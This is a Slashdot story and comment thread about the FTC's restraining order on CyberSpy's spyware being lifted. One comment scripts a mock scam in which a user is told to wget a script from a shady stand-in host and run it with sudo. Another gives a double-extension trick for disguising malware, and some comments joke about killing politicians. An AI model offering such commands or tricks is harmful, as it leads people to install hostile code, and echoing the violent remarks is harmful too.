Beta

×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Restraining Order On Commercial Spyware Lifted

Soulskill posted more than 4 years ago | from the sketchy-enough-for-government-work dept.

Security 97

Back in 2008, the US Federal Trade Commission filed a restraining order against CyberSpy Software, makers of a commercial spyware program that logged keystrokes, took screenshots, monitored IM conversations, and sent all the collected data back to the company's servers. Reader suraj.sun tips news that the order has now been lifted, allowing CyberSpy to sell its software, but with a few restrictions. "According to the US District Court settlement, the company must not provide users with the means to disguise the software as an innocent file or email attachment. Users must also be advised that doing so may violate US state or federal law. Additionally, all recorded information sent over the Internet must be encrypted and older legacy versions of the software must be removed from computers on which it was previously installed. ... RemoteSpy is said to employ rootkit techniques to hide from virus scanners."

cancel ×

97 comments

Sorry! There are no comments related to the filter you selected.

Cue in fucktard sopssa trolling in 3, 2, 1, ... (-1, Troll)

Anonymous Coward | more than 4 years ago | (#32474922)

Sopssa is a troll. Remember it moderators.

Easy fix... (4, Informative)

gringer (252588) | more than 4 years ago | (#32474954)

The final Order bars the defendants from providing purchasers with the means to disguise the product as an innocent file or e-mail attachment.

I'll do it for them:

1. rename 'malicious_software.exe' 'unicorns_with_flowers.jpg.exe'
2. attach to email

Re:Easy fix... (0)

DaMattster (977781) | more than 4 years ago | (#32475522)

The final Order bars the defendants from providing purchasers with the means to disguise the product as an innocent file or e-mail attachment.

I'll do it for them: 1. rename 'malicious_software.exe' 'unicorns_with_flowers.jpg.exe' 2. attach to email

Even easier fix .... use something other than Windows/Mac OS for your operating system.

Re:Easy fix... (1, Insightful)

selven (1556643) | more than 4 years ago | (#32476404)

No OS can possibly be secure against user security without giving the user no freedom (see: iPad).

Here's the similar exploit for Linux:

Linux newbie: How do I get $obscure_proprietary_hardware working on my system?
Evil black hat hacker: The following did it for me:

wget -O run.sh www.shady_website.ru/linux/puppies_and_unicorns/3a64bc92.txt
chmod +x run.sh
sudo ./run.sh

Linux newbie: Ok, thanks, I'll try that. I don't know what any of that means but it sure is nice to have people as advanced as you helping me!
Linux newbie: Sorry, I'm posting from my friend's computer here. My computer's broken from that. Any idea what it is?
Evil black hat hacker: Ok, we'll try SSHing into it and fixing everything remotely. Is your friend's computer also running Linux?
Linux newbie: Yes.
Evil black hat hacker: Ok, in order to SSH into your computer, first on your friend's machine run: wget -O run.sh www.shady_website.ru/lin...

Re:Easy fix... (1)

hairyfeet (841228) | more than 4 years ago | (#32477416)

Or you could just go to this handy site that explains how to write a Linux virus [geekzone.co.nz] in 5 easy steps (virus, trojan, worm, whatever, its a bug) and if you need a way to deploy it here is a PDF [arizona.edu] from researchers telling how they believe they can take over a repo without needing the private key. The simple fact is NOTHING is secure, short of using the "cut all the lines and bury it in a safe" method, which is why the military uses air gaps on important machines.

As for TFA, they'll probably have folks lined up to buy this crap. You don't know how many spouses want to spy on each other, it is just nuts! I actually had a state trooper come into my shop one time wanting me to have his wife's government email account to see if she was cheating. He actually thought him saying "I give you authorization" to hack a federal account would make it "okay". How sad that I had to explain to a state trooper that a state official can't give someone authorization to break into federal property.

Re:Easy fix... (0)

Anonymous Coward | more than 4 years ago | (#32478834)

i think what you are missing is that this is a company selling this data. for the government to be protected from everyone saying "how could the government allow people to download software to snoop on you", they say "you must do this". who cares if a website in new zealand tells you how to write a virus. this is an example of the government regulation. simple.

Re:Easy fix... (0)

Anonymous Coward | more than 4 years ago | (#32479104)

Sadder if you didn't report him for trying. As if it isn't reprehensible enough to ask you, attempting to (ab)use his authority is a serious crime.

Re:Easy fix... (0)

Anonymous Coward | more than 4 years ago | (#32481458)

How to write a virus is written by a moron. First of all what he wrote wasn't a virus. Second just because others give bad reasons for GNU/Linux being more secure than MS Windows doesn't mean GNU/Linux isn't more secure than MS Windows or safer than MS Windows for technically challenged users. It is safer and here is why. GNU/Linux has package management system and repositories that make it possible to streamline updates for all applications installed on a users system rather than just a handful of programs included with the operating system installation. Other proprietary software on MS Windows also has to be updated through yet other update mechanisms which almost never get updated by users. All of these leave users vulnerable. In the end most users have 10 to 15 applications they need to keep updated from pdf viewers, to flash, to java, to anti-virus, to office, to itunes. All infection points. None of these exist on GNU/Linux because the programs are all in the repository and the updates occur through one security update application. So the user only has to know how and to click one button on one screen.

Re:Easy fix... (1)

cappp (1822388) | more than 4 years ago | (#32478742)

To be fair the FTC required a fair bit more than the summary is stating.

...requires that the software provide notice that the program has been downloaded and obtain consent from computer owners before the software can be installed.
According to papers filed with the court, the defendants provided their clients with detailed instructions explaining how to disguise the spyware as an innocuous file, such as a photo, attached to an e-mail...
The final Order bars the defendants from providing purchasers with the means to disguise the product as an innocent file or e-mail attachment. It also requires that they inform purchasers that improper use of the software may violate state or federal law. The final Order also requires the defendants to take measures to reduce the risk that their spyware is misused, encrypt data transmitted over the Internet, police their affiliates to ensure they comply with the order, and remove legacy versions of the software from computers on which it was previously installed.

The FTC has failed. (0)

Anonymous Coward | more than 4 years ago | (#32474998)

How can the capture of keystrokes, screenshots and private conversations be logged without consent be anything but a violation of wire-tapping laws and anti-trade practices?

Perhaps we'll need a new Czar to oversee these

Re:The FTC has failed. (1, Informative)

Anonymous Coward | more than 4 years ago | (#32475170)

I believe it would vary depending on ownership of the machine, etc. For example, in the US it is probably legal for a corporation to monitor keystrokes it's employees make on the computers the company owns. (It probably is not legal to do so in the EU, but this was a US case). It may also depend on what prior information about logging was disseminated to employees. For example, at my work, we have a "logon banner" which comes up before logon that you have to "OK" in order to logon that contains text saying that you may be subject to monitoring. That probably makes it legal.

Re:The FTC has failed. (1, Informative)

Anonymous Coward | more than 4 years ago | (#32475180)

Companies use this type of software on employee computers owned by the company. The end user consents either in their employment contract or a terms of use contract they sign before they use the computer.

Re:The FTC has failed. (1)

AHuxley (892839) | more than 4 years ago | (#32475188)

You installed it on your own property for back up use :)

Re:The FTC has failed. (1)

jonbryce (703250) | more than 4 years ago | (#32475594)

I think Cyberspy is arguing that their software is intended to be installed with the consent of the owner of the computer. For example parents monitoring their childrens' computer useage, and employers monitoring their employees.

So Little (1)

Das Auge (597142) | more than 4 years ago | (#32475010)

Do the authorities care so little for the average citizen?

If they despise us so much, why don't they just allow phishing scams? Embezzlement? Ponzi scams?

Re:So Little (5, Interesting)

couchslug (175151) | more than 4 years ago | (#32475036)

"Do the authorities care so little for the average citizen?"

Yes. This will last a while, til things get rotten enough, then the purge-and-replace cycle begins again. It was ever thus, and so it shall be.

Re:So Little (2, Insightful)

digitalhermit (113459) | more than 4 years ago | (#32475430)

This will last a while, til things get rotten enough, then the purge-and-replace cycle begins again.

If only it were so simple. It's relatively easy to pass a law. It's a lot more difficult to repeal them.

Re:So Little (0)

selven (1556643) | more than 4 years ago | (#32475982)

Removing one law is difficult, but removing lots of laws is not that much more difficult. All you need is for a few dozen thousand people to get really angry and each try to put a bullet in the head of a politician. That's the "purge" part of the cycle, and some form of sudden violent collapse is the only way that in the real world political complexity ever actually goes down.

Re:So Little (0)

Anonymous Coward | more than 4 years ago | (#32479152)

What might be interesting is a website that, um, lists important people, and allows users to 'select' one or more of them to, um... kill.

Site: Senator so-and-so? He's anti-abortion, and pro-Iraq war. Anyone wanna take him out?
PeaceInTheMiddleEast sez: I will.
Site: Congressman whats-his-name? He is pro-RIAA. Who has him?
SharingIsNotStealign sez: Me!

etc.

Re:So Little (1, Insightful)

Anonymous Coward | more than 4 years ago | (#32479388)

Nah- just have a 'death pool' site. You know, you get to bet on how certain people will die. Once the prize pools get high enough, I think you'll find some people placing some very specific bets, and winning them.

Re:So Little (4, Insightful)

DaMattster (977781) | more than 4 years ago | (#32475532)

"Do the authorities care so little for the average citizen?"

Yes. This will last a while, til things get rotten enough, then the purge-and-replace cycle begins again. It was ever thus, and so it shall be.

Of course, don't you know government and industry are mostly in sleeping together? Why do you think BP got away with murder up until the point thhings quite literally exploded.

duh (2, Insightful)

KwKSilver (857599) | more than 4 years ago | (#32475104)

Do the authorities care so little for the average citizen? If they despise us so much, why don't they just allow phishing scams? Embezzlement? Ponzi scams?

The authorities "care" for the average citizen is roughly 0.000. Who says the don't allow scams, embezzlement and Ponzi schemes. Isn't all that what blew up the economy a couple of years ago?

Re:duh (1, Insightful)

Anonymous Coward | more than 4 years ago | (#32475244)

I think it is more because they don't like competition. Scams (Pork barrel projects) Ponzi (Social Security), Embezzlement (self voted raises).

Re:So Little (3, Insightful)

arth1 (260657) | more than 4 years ago | (#32475164)

Clearly, this is done "for the sake of" protecting children, "for the sake of" protecting us against terrorism, and "for the sake of" protecting our companies from industrial espionage.

When someone wearing a suit says "for the sake of", he or she means "in the name of".
Remember that the next time you vote.

Re:So Little (1)

Cryacin (657549) | more than 4 years ago | (#32475764)

Remember that the next time you vote.

So am I voting for Pepsi, or Coke?!?

Re:So Little (1)

arth1 (260657) | more than 4 years ago | (#32479272)

So am I voting for Pepsi, or Coke?!?

Yes, that's about the freedom you have right now.

If you'd rather want the choice of lemonade, you have only a few choices, including expatriation and sedition. Attempts at changing the system from within is futile, and will only lead to Minute Maid(R)(TM) with 3% lemon juice.

Re:So Little (2, Insightful)

Low Ranked Craig (1327799) | more than 4 years ago | (#32475308)

Well, yes, they do, but this is not an example of that. If I own a small company I can install whatever I want on my systems to monitor what my employees are doing for various reasons. I know of one specific case where a property management company does this to ensure that a disgruntled employee doesn't improperly handle a tenant's personal information - it is there for CYA reasons. I would also imagine that some parents would want to monitor their kids. I can see a lot of legitimate uses for this, and the ruling specifies that you cannot disguise the package as something else. I don't see or have a problem with this. Having said that, people will undoubtedly abuse the software, but that is true of most anything.

I don't think this is a good example of the authorities eroding the rights of the people - there are plenty [slashdot.org] of examples [boston.com] of that [slashdot.org] to be had.

Re:So Little (1)

CrimsonAvenger (580665) | more than 4 years ago | (#32476214)

If they despise us so much, why don't they just allow phishing scams? Embezzlement? Ponzi scams?

Since they run the largest Ponzi scheme in US History, I suspect that they're only down on them because they don't like competition.

Re:So Little (0)

Anonymous Coward | more than 4 years ago | (#32477962)

Govt has bigger guns than the market, so the ppl's elected reps can create money too. Artificial scarcity of money is a meme that bankers want you to believe is "natural law", but we outnumber them!

Re:So Little (1)

petermgreen (876956) | more than 4 years ago | (#32480020)

If you increase the amount of money the value of each unit of money goes down. A system with unlimited money would mean each unit of money becomes worthless.

Re:So Little (1, Insightful)

Anonymous Coward | more than 4 years ago | (#32476456)

Do the authorities care so little for the average citizen?

Absolutely. The bureaucrats in Washington typically do little or nothing until the situation gets so bad that it threatens re-election opportunities; e.g., the 9-11, financial collapse, the BP environmental disaster. Once a situation reaches this level, they'll stand in front of every camera possible to declare something must be done in order to save face. Without this incentive, they're more than happy to sit on the lap of the corporate-backed lobbyists.

Of course, it doesn't say much about the American people that it takes a disaster of this level to get us motivated.

Re:So Little (0)

Anonymous Coward | more than 4 years ago | (#32476888)

This from a Slashdotter? I thought Slashdotters were all about "don't ban software just because it is capable of being used for illegal purposes". You know, like Dmitry Sklyarov and his tools for "recovering forgotten passwords".

Hmmm ... (1)

WrongSizeGlass (838941) | more than 4 years ago | (#32475018)

I wonder if the government lifted its restraining order on this software because they're using it, or a variation, themselves? Requiring encryption? Users can't disguise it, but what about government agencies? I may sound paranoid, but I don't care ... I'm going to buy a tinfoil hat for my computer!

Re:Hmmm ... (1)

AHuxley (892839) | more than 4 years ago | (#32475220)

http://en.wikipedia.org/wiki/Magic_Lantern_(software) [wikipedia.org]
Best to keep computer land flooded with low grade consumer OS and issues.
Just another warning, click and its gone.
What would the feds do if more users had Unix like backends with gui pop ups about changes to vital system areas?

Re:Hmmm ... (1)

Weezul (52464) | more than 4 years ago | (#32475298)

No, just another evil corporation that isn't actually chopping up kittens and has powerful lobbyists. Yeah, amybe those lobbyists are partially police agencies, but surely the NSA/CIA don't need these guys.

Re:Hmmm ... (1)

DaMattster (977781) | more than 4 years ago | (#32475626)

I wonder if the government lifted its restraining order on this software because they're using it, or a variation, themselves? Requiring encryption? Users can't disguise it, but what about government agencies? I may sound paranoid, but I don't care ... I'm going to buy a tinfoil hat for my computer!

Switch to the most secure operating system in the world, OpenBSD. No tinfoil needed.

Tinfoil hat? Don't do it! (1)

Benfea (1365845) | more than 4 years ago | (#32485442)

Tinfoil hats actually amplify government mind control rays [mit.edu] ! Putting on tinfoil hats is exactly what they want you to do! ;)

Use in the workplace (3, Insightful)

masmullin (1479239) | more than 4 years ago | (#32475046)

I am assuming that the order was recinded because workplaces might want this functionality. It sucks for workplaces to do this but it's their right to install this sw on the computers they own

Re:Use in the workplace (1)

Ornedan (1093745) | more than 4 years ago | (#32475148)

I see you are successfully ignoring the stealth aspect. Or maybe you think an employer has the right to spy on employees? (note spy vs monitor)

Re:Use in the workplace (0)

Anonymous Coward | more than 4 years ago | (#32475212)

Exactly right. When I worked at a local bank, they had monitoring software installed on all of their machines. Everyone working at our branch were aware of it but fortunately they only really cared about using it when we called the help desk etc. etc.
What I was more disappointed with was that their e-mail system allowed supervisors to monitor our (corporate) e-mail, something they failed to notify us of and more than one person got in trouble saying something they shouldn't have.
Of course that rule was hidden in the fine print of the computer usage policy and not mentioned to anyone unless you did something out of line.

Re:Use in the workplace (1, Insightful)

Anonymous Coward | more than 4 years ago | (#32475334)

I never understood that mentality. If you are representing the company in a n official capacity (using company email) and putting something in writing, why would you assume they won't find out? If they were monitoring your personal email (sent from home, not work) then I could understand the outrage, but WTF? It's the same thing with business phone calls at work. They should be monitoring them to make sure people aren't being rude, saying things that are wrong (legally and also for just simple mistakes).

Re:Use in the workplace (1)

DaMattster (977781) | more than 4 years ago | (#32475564)

I see you are successfully ignoring the stealth aspect. Or maybe you think an employer has the right to spy on employees? (note spy vs monitor)

I guess it depends upon your purview and political orientation. An employer does have certain rights to protect its company image but only while implied employee is on company time. I've heard about stories about Coors employees being fired for drinking Bud while on their own time! This kind of spying is wrong!

Or on your own systems (4, Insightful)

Sycraft-fu (314770) | more than 4 years ago | (#32475160)

Not saying I'd trust software like this, but I could see the potential in wanting to be able to monitor your own computers. Maybe you live with roommates and you don't trust them to leave your shit alone, etc.

There are legit uses for having clandestine reporting software on a PC. Same deal as lock picks, firearms, and many other things with legal and illegal uses.

Sounds like the problem with these guys is they were attempting to primarily market it for illegal use. That is what gets you in trouble. If something has legal and illegal uses, but you market it for legal uses and attempt to sell it only to legal users, then you are fine. If you market it for illegal purposes, then you get in trouble.

That is why smoke shops are so big on what you say you are going to use their glassware for. It is perfectly legal to buy it for smoking tobacco. Bongs and such derive from Hookahs which were invented for the purpose of smoking tobacco. However, if you imply that you intend to use their products for smoking marijuana or other controlled substances, they'll refuse to sell to you. In this way they can make sure to stay clear legally. Though their products have illegal uses, they only market them for legal ones, and take care to attempt to not sell them for illegal purposes.

Re:Or on your own systems (1, Interesting)

Anonymous Coward | more than 4 years ago | (#32476268)

That is why smoke shops are so big on what you say you are going to use their glassware for.

As someone who sold smoking accessories at one time, I can attest to this. We flat told people that these were for tobacco use only and that if they made any reference to illegal use, we would not sell to them. Ironic, but about 3% of the people were too stupid (or stoned) to understand this, thus they didn't get to buy. Otherwise, I would have been guilty of selling "drug paraphernalia" and subject to a fine or losing my business license.

Then again, laws against marijuana are stupid to begin with, and half the cops I know would like them repealed. The only group that I am aware of that unanimously wants to keep marijuana illegal is the drug dealers, who profit greatly by selling a weed that will grow almost anywhere.

Re:Or on your own systems (1)

DigiShaman (671371) | more than 4 years ago | (#32477644)

The only problem I have with marijuana is with regards to driver and work safety. It has an adverse effect on reaction time. Agencies such as NHTSA and OSHA would agree I'm sure.

On the whole, marijuana's impact on the body is far less damaging (if at all) compared to alcohol. However, THC (active substance in marijuana) takes longer to metabolize than alcohol does. If you smoke habitually, it starts to effect serotonin levels until the user stops. It's now even more serious with newer breeds of plants. THC level increases between 15% and 25% are not uncommon. Once it become industrialized with genetic engineering, I can only imagine how much more potent they can get. While federal regulation can play a major role here, metabolization within a 12 to 24 hour period would be a major issue with regards to cognitive impairment.

Re:Or on your own systems (0)

Anonymous Coward | more than 4 years ago | (#32478044)

See the Domino's Pizza Delivery Driver study for proof that being stoned does not affect driving safety. How do you explain intricate and precise muscle control and memory tasks performed by regularly stoned musicians, or video game playing, if reactions times are affected adversely by marijuana? How about stoned athletes (Michael Phelps)?

Re:Or on your own systems (1)

DigiShaman (671371) | more than 4 years ago | (#32478252)

Have you ever been stoned? Do you even know why it's called "stoned"? Depending on how stoned you are, the feeling is like you head being in one location while the body is half way around the world connected via a very long spinal cord. We're talking about a major millisecond (to full second) delay in reaction time.

You do not want to be operating a band-saw while stoned. Unless you don't mind losing a few fingers in the process!

Re:Or on your own systems (0)

Anonymous Coward | more than 4 years ago | (#32478696)

It seems to me it is you that have never been stoned, or if so not very many times.

As a long time imbiber, I have had none of the experiences you describe.

I have operated very complex machinery and never had the slightest incident, including hundreds of thousands of kilometers driving.

Re:Or on your own systems (0)

Anonymous Coward | more than 4 years ago | (#32479100)

I have no problem with people operating power tools while stoned.

As long as they are not near me.

The problem. if there is one... will sort itself out.

As for drivers? Stoned drivers are not dangerous. Lost? Driving too slow? Yeah maybe. But dangerous? no way.

Re:Or on your own systems (1)

Garrett Fox (970174) | more than 4 years ago | (#32478148)

How can we plausibly restrict the sale of malware if the seller can point to the smoke shops for comparison? Seems like they only have to wink and say "don't tell us you plan to do anything illegal with it".

Re:Or on your own systems (0)

Anonymous Coward | more than 4 years ago | (#32479834)

Or how about the existence of Pirate Bay and various other torrent sites? All it takes is once cracked copy to get released and then it's malware heaven for script kiddies everywhere!

What if you own half of the computer? (1)

QuincyDurant (943157) | more than 4 years ago | (#32475190)

It's their right to install this sw on the computers they own.

California is a community property state. This means your wife owns half of your computer. Uh, oh. And even if you live in a spare bedroom at your mom's house, single and bad husband material at age 32, you may not want this software to email mom a jpeg of the download page from www.toilet-rated-pron.com She bought it for you, remember?

Re:What if you own half of the computer? (1)

NNKK (218503) | more than 4 years ago | (#32475270)

Absent specific laws or agreements to the contrary, each owner in a jointly-owned property has the right to do anything they want with said property, with or without the consent of the other owner(s).

Re:Use in the workplace (2, Interesting)

arth1 (260657) | more than 4 years ago | (#32475198)

I am assuming that the order was recinded because workplaces might want this functionality. It sucks for workplaces to do this but it's their right to install this sw on the computers they own

Is it also their right to install cameras in toilet stalls they own?
How about searching through cars in the parking lot they own?

It's easy to extend your logic to the point where the company owns you, and I don't think we want to approach those times again. (Personally, I'd like to see the point where the workers own the company, not the other way around.)

Re:Use in the workplace (3, Insightful)

drinkypoo (153816) | more than 4 years ago | (#32475338)

Is it also their right to install cameras in toilet stalls they own?
How about searching through cars in the parking lot they own?

Are you really this stupid? The company already has a legal right to monitor your work activity, and already doesn't have a legal right to search your car or to watch you poop. Further, there is a clear difference between one and the other. The toilet is provided for your needs. The car is yours. The computer is provided for their needs, i.e. your work output.

It's reasonable not to want to work for someone who monitors your work activity, but not reasonable to compare that to monitoring your toilet activity.

Re:Use in the workplace (1)

arth1 (260657) | more than 4 years ago | (#32478084)

If by "really this stupid", you mean "think beyond the initial gut reaction", I sure hope so.

If the computer is only for company use, you have a case. If, however, the company allows the user any personal use of the computer, be it to read news during breaks, check personal e-mail, or listen to personal music, then it's not so clear-cut anymore. Then they do indeed provide computer resources "for your need" (your words) too, and monitoring that would logically be no different from monitoring other personal actions at the work place, be it your locker, the parking lot, or the rest rooms. It's then only a question of degrees, which is exactly why it's a slippery slope.

Re:Use in the workplace (0)

Anonymous Coward | more than 4 years ago | (#32478532)

I'm sorry, but if it's company equipment and you're ALLOWED to use it for personal use, that doesn't mean you're suddenly entitled to privacy. It's still their equipment. If you start using it to torrent movies, download shit from sites that will get undesired law enforcement attention, or snag pirated software, they have a right to know. If you're using it to harass or threaten people, they have a right to know. They're going to be stuck with some of the liability if they DON'T keep an eye on things most likely.

Sure it sucks, but if you want truly unmonitored activity on a computer, use your own that you paid for and manage yourself, and check it for malware and viruses regularly. Don't expect that to come from your employer. It just ain't gonna happen.

Re:Use in the workplace (1)

Imrik (148191) | more than 4 years ago | (#32478880)

You do not "need" to use a computer for personal reasons at work. As long as the company is up front about the monitoring software on the computer it is your option whether you want to use it for personal reasons.

Re:Use in the workplace (1)

arth1 (260657) | more than 4 years ago | (#32479226)

You do not "need" to use their parking lot or their rest room either. By the same logic, it's OK for a company to install monitoring devices and perform searches there too, as long as they are "up front" about it.

No, it's high time that employers are told what's permissible and what's not. Anything private should not be subject to searches, else we're already on that slippery slope.

Today, it's OK if they log your web access and go through e-mails stored on your computer.
Tomorrow, it's OK if they read through the remote e-mails you view on the screen, or your bank records if you view them through a browser at work.
Next week, it's OK if they scan USB keys and search through pockets of company uniforms.
Next month, it's OK if they scan cell phones and search through your lockers.
Next year, it's OK if they search through parked cars on their premises.
Next year, it's OK if they install cameras in the rec room (in the name of security!)
Two years from now, it's OK to install them in the bathrooms too (it says so on your contract; take it, or we'll hire someone of the 20% unemployed who's willing to sign).

You can't stop sliding here, unless you can clearly define what's permissible and what's not, in a way that cannot also be applied to other situations. Up until now, what's private is considered private even if it happens at a work place. Only law enforcement should be allowed to search what's private -- not company executives. I thought this was made pretty clear during Fiorinagate?

Re:Use in the workplace (1)

eyore15 (1541595) | more than 4 years ago | (#32484242)

Is it also their right to install cameras in toilet stalls they own? How about searching through cars in the parking lot they own?

Are you really this stupid? The company already has a legal right to monitor your work activity, and already doesn't have a legal right to search your car or to watch you poop. Further, there is a clear difference between one and the other. The toilet is provided for your needs. The car is yours. The computer is provided for their needs, i.e. your work output.

It's reasonable not to want to work for someone who monitors your work activity, but not reasonable to compare that to monitoring your toilet activity.

I've been under the impression that monitoring your personal habits is part of the Japanese method management. Too many potty breaks and you get a stern talking to

Re:Use in the workplace (2, Interesting)

Low Ranked Craig (1327799) | more than 4 years ago | (#32475380)

That's a bit of a red herring. For example, a company that handles personal customer info has a duty to ensure that that information is handled properly, and closely monitoring employee's handling of that data is completely legitimate as is making sure that the employee isn't spending all day playing Farmville. This is a very poor slippery slope argument - it is NOT easy to extend that logic to to video surveillance of a bathroom stall.

Re:Use in the workplace (1)

DaMattster (977781) | more than 4 years ago | (#32475584)

That's a bit of a red herring. For example, a company that handles personal customer info has a duty to ensure that that information is handled properly, and closely monitoring employee's handling of that data is completely legitimate as is making sure that the employee isn't spending all day playing Farmville. This is a very poor slippery slope argument - it is NOT easy to extend that logic to to video surveillance of a bathroom stall.

If you were monitored while taking your daily constitution, and it somehow got back to you, you would have a hell of law suit against your employer.

Re:Use in the workplace (1)

Low Ranked Craig (1327799) | more than 4 years ago | (#32475840)

You'll need to explain that in more detail. If my employer tells me that they can and might monitor my system and I go to youporn.com on the company computer while on my "daily constitution" and I get canned, how exactly would I have a hell of a lawsuit against my employer?

Re:Use in the workplace (1)

WillDraven (760005) | more than 4 years ago | (#32475956)

I hate to have to be the one to tell you this, but, "daily constitution" is a euphemism for a bowel movement. The GP wasn't talking about using the computers, he was talking about using the bathroom.

Re:Use in the workplace (1)

TheLink (130905) | more than 4 years ago | (#32476874)

Maybe he knew that already. In theory it's possible to use a computer while doing that. Just hope you don't inherit his "company issue laptop"...

Re:Use in the workplace (1)

gringofrijolero (1489395) | more than 4 years ago | (#32476148)

The bathroom stall is the scene of much corporate espionage (you know, where you see the guy inserting or removing the capsule containing the microfilm, looking at it, then getting knocked on the head by a guy wearing the black ski mask), it is a legitimate surveillance target.. well, in Hollywood anyway

Re:Use in the workplace (0)

Anonymous Coward | more than 4 years ago | (#32476826)

true, I want my social security number logged by keyloggers and sent unencrypted to some central server owned by a company that was under investigation by the justice department as much as possible, that will be much more secure. I wonder if they will be using this stuff for the banking employees in indian prisons?

Re:Use in the workplace (1)

arth1 (260657) | more than 4 years ago | (#32478160)

as is making sure that the employee isn't spending all day playing Farmville

Why, exactly?
I can see that it's in the interest of the company to get as much work as at all possible out of an employee, but if one salaried employee works 8 hours and produces X amount of work, and the salaried employee in the next cubicle plays Farmville for 6 hours a day and STILL produces X amount of work, it's no loss. Both do their work. If a company wants them to work constantly, they should put them on wages, not salary. The whole reason behind salary is that you pay the employees to get the job done, not per ounce of sweat. It's not (as it's being used as now) a method to avoid having to pay overtime.

Of course, whether the user can access Farmville (or whatever) safely from a computer that has customer data is another matter. A VM for personal use that's on a different subnet would probably not be a bad idea.

Re:Use in the workplace (0)

Anonymous Coward | more than 4 years ago | (#32487652)

Um, this isn't correct. A salaried employee is most usually paid on hours worked, not output. If their output is significantly different from the expected output, they can (usually) expect either an increase in income, or dismissal, depending on the difference. But a full-time employee, in the US, is paid to work 40 hours per week for their employer, usually during specified hours. If that employee is doing something other than working during those hours, their employer has a legitimate grievance against them.

Re:Use in the workplace (1)

DaMattster (977781) | more than 4 years ago | (#32475600)

It's easy to extend your logic to the point where the company owns you, and I don't think we want to approach those times again. (Personally, I'd like to see the point where the workers own the company, not the other way around.)

I think we never left those times. There are still FEW laws that protect the employee and MANY that protect the employer.

Re:Use in the workplace (1)

Runaway1956 (1322357) | more than 4 years ago | (#32476232)

And, the legal situation is dynamic. Why do you think so many corporations are so happy to employ illegal aliens? It isn't just the up-front cost of employment. Millions of illegals also give the corporates the muscle to avoid increased wages, benefits, and rights of employees. If half of your employees are afraid to talk to a law enforcement officer for any reason, he certainly isn't going to rat on you for putting spycams in the restrooms! Any lesser violation of an employee's rights simply won't be noticed.

Re:Use in the workplace (1)

Alwin Henseler (640539) | more than 4 years ago | (#32475208)

Hardly. Of course as an employee it would be safer not to use workplace machines for private affairs at all... but:

It's perfectly reasonable a company should have control over how employees use the employer's equipment. But that should be limited to "work-time spent doing other things", "making sure company gear isn't used for illegal activity", "making sure company network isn't cluttered because company machines are (ab)used for P2P downloads", "blocking access to risky sites, or allowing access only to sites that won't cause malware infections", etc. etc. Summarized: operational issues.

That's something entirely different from "allowing employer to spy on everything an employee does". There's no reasonable grounds for that, period. If the law says otherwise than that law is wrong.

Re:Use in the workplace (3, Interesting)

GillyGuthrie (1515855) | more than 4 years ago | (#32475288)

The name of the software company ("CyberSpy") sure seems to imply that its marketing strategy is to appeal to the obsessive stalker who needs a convenient way to spy on another person and steal their passwords, read their email, etc. I personally knew a guy that was so obsessed with his ex that he tricked her into d/l a similar spy program with very similar functionality to CyberSpy and all he did was change the filename of the install package to something a little less obvious (unicorns_with_flowers.jpg.exe was a good example).

I agree that the most legitimate use of this software would be for employers to monitor their employees. An employer who owns the computers its employees are using has a right to install spyware without employee's knowledge... duh. They are handing out paychecks and if they don't want their employees farting around on Facebook all afternoon, it's their right to "spy" and verify that rules are not being broken.

Re:Use in the workplace (1)

andymadigan (792996) | more than 4 years ago | (#32475800)

How about just firing them when they don't get their work done on time? Quite a bit easier than watching everything they do.

Re:Use in the workplace (1)

masmullin (1479239) | more than 4 years ago | (#32476238)

Because the gp is wrong. It's not about making sure the employees are using their time efficiently, it's about making sure that they aren't doing nefarious things like sharing trade secrets

Re:Use in the workplace (0)

Anonymous Coward | more than 4 years ago | (#32478144)

I think they've set up a system where they get to control others' behavior. It persists only because we believe them. Workers of the world unite!

Re:Use in the workplace (3, Insightful)

fuzzyfuzzyfungus (1223518) | more than 4 years ago | (#32475814)

As does its feature set. In your standard corporate/institutional environment, you don't need stealthy install techniques, since IT already has mechanisms in place for rolling out whatever software is needed; and you don't need any sophisticated AV-dodging techniques, since AV is typically centrally managed, and IT can whitelist whatever they want.

At best, this stuff is being used in interpersonally-touchy-but-legal ways(ugly roommate situations, spying on the kiddies, spousal paranoia, etc.), and I'm guessing that the sliminess of the customer base just increases from there.

Re:Use in the workplace (1)

penix1 (722987) | more than 4 years ago | (#32475998)

I agree that the most legitimate use of this software would be for employers to monitor their employees. An employer who owns the computers its employees are using has a right to install spyware without employee's knowledge... duh. They are handing out paychecks and if they don't want their employees farting around on Facebook all afternoon, it's their right to "spy" and verify that rules are not being broken.

There are far more efficient ways than installing a rootkit on computers to "catch" employees. And no, I don't agree that an employer has the right to spy on employees without their consent as a condition of using the computer. If you are so worried that an employee is going to goof off, then maybe you don't have a clue how to manage your employees. In short, if an employee can maintain a satisfactory enough output that they retain their job, and have time to goof off, then you evidently don't have enough for them to do.

If you don't want your employees using facebook, then block access to facebook. Better yet, instead of blacklisting, employ whitelisting. Only allow work related sites through. That beats the spying.

Lastly, any organization that has that much distrust of their employees that they have to employ rootkits isn't a company I am willing to work for. Trust, like respect, is a two way street. If you don't trust me to do the job I was hired to do, then say so and I'll leave.

Re:Use in the workplace (1)

GillyGuthrie (1515855) | more than 4 years ago | (#32476294)

I don't agree that an employer has the right to spy on employees without their consent as a condition of using the computer.

It IS their right... but you ARE allowed to disagree.

If you are so worried that an employee is going to goof off, then maybe you don't have a clue how to manage your employees.

I'M not a manager, I'm just a general-purpose technician. If a local business manager calls me and says he wants to limit Facebook access, I'm not going to advise him on his managerial skills. I am going to blacklist *.facebook.com on the local DNS server or use a DynDNS account with blacklisting/filtering and point the offender's NIC to that address. If he insists that he has made the decision that he wants spyware installed, guess what - I'll install it for him (assuming it's legal).

In short, if an employee can maintain a satisfactory enough output that they retain their job, and have time to goof off, then you evidently don't have enough for them to do.

I would absolutely hate to have a job where I have to maintain "satisfactory output" and have nothing to do, and out of boredom surf Facebook. I have a friend who feels this way, and spends literally hours a day sitting at his desk playing games on his Droid, making $40,000/yr. That actually pisses me off and I hope I don't ever degenerate into somebody who feels like I need a babysitter as a boss who spoonfeeds me work and checks in on me to make sure I'm busy.

Re:Use in the workplace (2, Informative)

LordAndrewSama (1216602) | more than 4 years ago | (#32475462)

